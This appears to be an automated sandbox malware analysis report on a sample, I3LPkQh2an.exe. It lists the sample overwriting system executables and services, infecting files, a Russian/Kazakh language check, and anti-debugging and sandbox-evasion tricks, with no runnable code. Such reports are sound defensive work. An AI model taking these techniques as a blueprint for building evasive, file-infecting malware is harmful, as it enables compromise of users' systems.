Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00AFCBD0

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00423187

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe

Code function: 7_2_005552A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]

7_2_005552A0

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

API/Special instruction interceptor: Address: E88A14

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 9_2_0397096E rdtsc

9_2_0397096E

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe			Jump to dropped file
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Dropped PE file which has not been started: C:\Windows\System32\FXSSVC.exe			Jump to dropped file

Source: C:\Windows\System32\AppVClient.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	API coverage: 4.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Users\user\Desktop\I3LPkQh2an.exe TID: 7764	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 7872	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: I3LPkQh2an.exe, 00000000.00000003.1382449777.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1389062664.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1409417800.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AppVClient.exe, 00000007.00000003.1385254039.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.1394886686.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1384465016.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: I3LPkQh2an.exe, 00000000.00000003.1382449777.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1409417800.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1389062664.0000000000E86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWc

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	API call chain: ExitProcess graph end node			graph_0-109275
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	API call chain: ExitProcess graph end node			graph_0-109629

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 9_2_0397096E rdtsc

9_2_0397096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 9_2_00417D33 LdrLoadDll,

9_2_00417D33

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435A7C

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00574594 mov eax, dword ptr fs:[00000030h]	0_2_00574594
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AD1130 mov eax, dword ptr fs:[00000030h]	0_2_00AD1130
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B13F3D mov eax, dword ptr fs:[00000030h]	0_2_00B13F3D
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00E87650 mov eax, dword ptr fs:[00000030h]	0_2_00E87650
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00E88CE0 mov eax, dword ptr fs:[00000030h]	0_2_00E88CE0
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00E88C80 mov eax, dword ptr fs:[00000030h]	0_2_00E88C80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03928397 mov eax, dword ptr fs:[00000030h]	9_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03928397 mov eax, dword ptr fs:[00000030h]	9_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03928397 mov eax, dword ptr fs:[00000030h]	9_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392E388 mov eax, dword ptr fs:[00000030h]	9_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392E388 mov eax, dword ptr fs:[00000030h]	9_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392E388 mov eax, dword ptr fs:[00000030h]	9_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395438F mov eax, dword ptr fs:[00000030h]	9_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395438F mov eax, dword ptr fs:[00000030h]	9_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE3DB mov eax, dword ptr fs:[00000030h]	9_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE3DB mov eax, dword ptr fs:[00000030h]	9_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE3DB mov ecx, dword ptr fs:[00000030h]	9_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DE3DB mov eax, dword ptr fs:[00000030h]	9_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D43D4 mov eax, dword ptr fs:[00000030h]	9_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D43D4 mov eax, dword ptr fs:[00000030h]	9_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EC3CD mov eax, dword ptr fs:[00000030h]	9_2_039EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039383C0 mov eax, dword ptr fs:[00000030h]	9_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039383C0 mov eax, dword ptr fs:[00000030h]	9_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039383C0 mov eax, dword ptr fs:[00000030h]	9_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039383C0 mov eax, dword ptr fs:[00000030h]	9_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B63C0 mov eax, dword ptr fs:[00000030h]	9_2_039B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039663FF mov eax, dword ptr fs:[00000030h]	9_2_039663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039403E9 mov eax, dword ptr fs:[00000030h]	9_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039403E9 mov eax, dword ptr fs:[00000030h]	9_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039403E9 mov eax, dword ptr fs:[00000030h]	9_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039403E9 mov eax, dword ptr fs:[00000030h]	9_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039403E9 mov eax, dword ptr fs:[00000030h]	9_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039403E9 mov eax, dword ptr fs:[00000030h]	9_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039403E9 mov eax, dword ptr fs:[00000030h]	9_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039403E9 mov eax, dword ptr fs:[00000030h]	9_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392C310 mov ecx, dword ptr fs:[00000030h]	9_2_0392C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A08324 mov eax, dword ptr fs:[00000030h]	9_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A08324 mov ecx, dword ptr fs:[00000030h]	9_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A08324 mov eax, dword ptr fs:[00000030h]	9_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A08324 mov eax, dword ptr fs:[00000030h]	9_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03950310 mov ecx, dword ptr fs:[00000030h]	9_2_03950310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A30B mov eax, dword ptr fs:[00000030h]	9_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A30B mov eax, dword ptr fs:[00000030h]	9_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396A30B mov eax, dword ptr fs:[00000030h]	9_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B035C mov eax, dword ptr fs:[00000030h]	9_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B035C mov eax, dword ptr fs:[00000030h]	9_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B035C mov eax, dword ptr fs:[00000030h]	9_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B035C mov ecx, dword ptr fs:[00000030h]	9_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B035C mov eax, dword ptr fs:[00000030h]	9_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B035C mov eax, dword ptr fs:[00000030h]	9_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FA352 mov eax, dword ptr fs:[00000030h]	9_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D8350 mov ecx, dword ptr fs:[00000030h]	9_2_039D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B2349 mov eax, dword ptr fs:[00000030h]	9_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D437C mov eax, dword ptr fs:[00000030h]	9_2_039D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A0634F mov eax, dword ptr fs:[00000030h]	9_2_03A0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E284 mov eax, dword ptr fs:[00000030h]	9_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E284 mov eax, dword ptr fs:[00000030h]	9_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B0283 mov eax, dword ptr fs:[00000030h]	9_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B0283 mov eax, dword ptr fs:[00000030h]	9_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B0283 mov eax, dword ptr fs:[00000030h]	9_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039402A0 mov eax, dword ptr fs:[00000030h]	9_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039402A0 mov eax, dword ptr fs:[00000030h]	9_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C62A0 mov eax, dword ptr fs:[00000030h]	9_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C62A0 mov ecx, dword ptr fs:[00000030h]	9_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C62A0 mov eax, dword ptr fs:[00000030h]	9_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C62A0 mov eax, dword ptr fs:[00000030h]	9_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C62A0 mov eax, dword ptr fs:[00000030h]	9_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C62A0 mov eax, dword ptr fs:[00000030h]	9_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039402E1 mov eax, dword ptr fs:[00000030h]	9_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039402E1 mov eax, dword ptr fs:[00000030h]	9_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039402E1 mov eax, dword ptr fs:[00000030h]	9_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A062D6 mov eax, dword ptr fs:[00000030h]	9_2_03A062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392823B mov eax, dword ptr fs:[00000030h]	9_2_0392823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392A250 mov eax, dword ptr fs:[00000030h]	9_2_0392A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936259 mov eax, dword ptr fs:[00000030h]	9_2_03936259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EA250 mov eax, dword ptr fs:[00000030h]	9_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EA250 mov eax, dword ptr fs:[00000030h]	9_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B8243 mov eax, dword ptr fs:[00000030h]	9_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B8243 mov ecx, dword ptr fs:[00000030h]	9_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E0274 mov eax, dword ptr fs:[00000030h]	9_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03934260 mov eax, dword ptr fs:[00000030h]	9_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03934260 mov eax, dword ptr fs:[00000030h]	9_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03934260 mov eax, dword ptr fs:[00000030h]	9_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392826B mov eax, dword ptr fs:[00000030h]	9_2_0392826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A0625D mov eax, dword ptr fs:[00000030h]	9_2_03A0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B019F mov eax, dword ptr fs:[00000030h]	9_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B019F mov eax, dword ptr fs:[00000030h]	9_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B019F mov eax, dword ptr fs:[00000030h]	9_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B019F mov eax, dword ptr fs:[00000030h]	9_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392A197 mov eax, dword ptr fs:[00000030h]	9_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392A197 mov eax, dword ptr fs:[00000030h]	9_2_0392A197
